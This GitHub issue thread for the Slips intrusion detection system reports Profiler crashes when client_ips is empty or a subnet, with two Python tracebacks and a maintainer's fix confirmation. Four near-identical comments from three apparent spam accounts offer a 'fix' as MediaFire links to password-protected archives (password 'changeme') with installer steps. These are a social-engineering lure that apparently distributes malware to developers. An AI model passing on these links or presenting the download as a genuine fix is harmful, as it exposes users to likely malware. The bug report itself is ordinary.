### ISSUE TITLE
module Profiler crashes when client_ips is empty or a subnet

### ISSUE THREAD

**Issue by be-a-panther** [stratosphereips/StratosphereLinuxIPS#968]
**Describe the bug**
```
[Profiler] Traceback (most recent call last):
  File "/StratosphereLinuxIPS/slips_files/common/abstracts/core.py", line 52, in run
    error: bool = self.main()
  File "/StratosphereLinuxIPS/slips_files/core/profiler.py", line 508, in main
    self.handle_setting_local_net()
  File "/StratosphereLinuxIPS/slips_files/core/profiler.py", line 452, in handle_setting_local_net
    self.db.set_local_network(local_net)
  File "/StratosphereLinuxIPS/slips_files/core/database/database_manager.py", line 110, in set_local_network
    return self.rdb.set_local_network(*args, **kwargs)
  File "/StratosphereLinuxIPS/slips_files/core/database/redis_db/database.py", line 488, in set_local_network
    self.r.set("local_network", cidr)
  File "/usr/local/lib/python3.10/dist-packages/redis/client.py", line 1801, in set
    return self.execute_command('SET', *pieces)
  File "/usr/local/lib/python3.10/dist-packages/redis/client.py", line 900, in execute_command
    conn.send_command(*args)
  File "/usr/local/lib/python3.10/dist-packages/redis/connection.py", line 725, in send_command
    self.send_packed_command(self.pack_command(*args),
  File "/usr/local/lib/python3.10/dist-packages/redis/connection.py", line 775, in pack_command
    for arg in imap(self.encoder.encode, args):
  File "/usr/local/lib/python3.10/dist-packages/redis/connection.py", line 119, in encode
    raise DataError("Invalid input of type: '%s'. Convert to a "
redis.exceptions.DataError: Invalid input of type: 'NoneType'. Convert to a bytes, string, int or float first.
```
nor does a subnet works:
```
2024/08/28 05:58:49.653920 [Profiler] Problem in Profiler
2024/08/28 05:58:49.656015 [Profiler] Traceback (most recent call last):
  File "/StratosphereLinuxIPS/slips_files/common/abstracts/core.py", line 52, in run
    error: bool = self.main()
  File "/StratosphereLinuxIPS/slips_files/core/profiler.py", line 508, in main
    self.handle_setting_local_net()
  File "/StratosphereLinuxIPS/slips_files/core/profiler.py", line 448, in handle_setting_local_net
    if not self.should_set_localnet():
  File "/StratosphereLinuxIPS/slips_files/core/profiler.py", line 301, in should_set_localnet
    if self.get_private_client_ips():
  File "/StratosphereLinuxIPS/slips_files/core/profiler.py", line 420, in get_private_client_ips
    if utils.is_private_ip(ipaddress.ip_address(ip)):
  File "/usr/lib/python3.10/ipaddress.py", line 54, in ip_address
    raise ValueError(f'{address!r} does not appear to be an IPv4 or IPv6 address')
ValueError: '11.0.0.0/24' does not appear to be an IPv4 or IPv6 address
```

**To Reproduce**
1. have an promiscuous interface 
2. start slips with that as input

**Expected behavior**
- Either check for an promiscuous interface or analyze the traffic before setting this value.

**Screenshots**

**Branch**
v1.1

**Environment (please complete the following information):**
    OS: Debian
    Version: bookworm
    Python version: 3.11.2
    Are you running slips in docker or locally? yes
    Docker version (if running slips in docker) 20.10.24+dfsg1
    Slips docker image used (if running slips in docker) ubuntu-image, dependency-image

**Additional context**

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AlyaGomaa** [comment]
hey @be-a-panther nice finding! thanks for reporting

I'm on it.

**Comment by AlyaGomaa** [comment]
Fixed in the latest develop. @be-a-panther  thanks for reporting
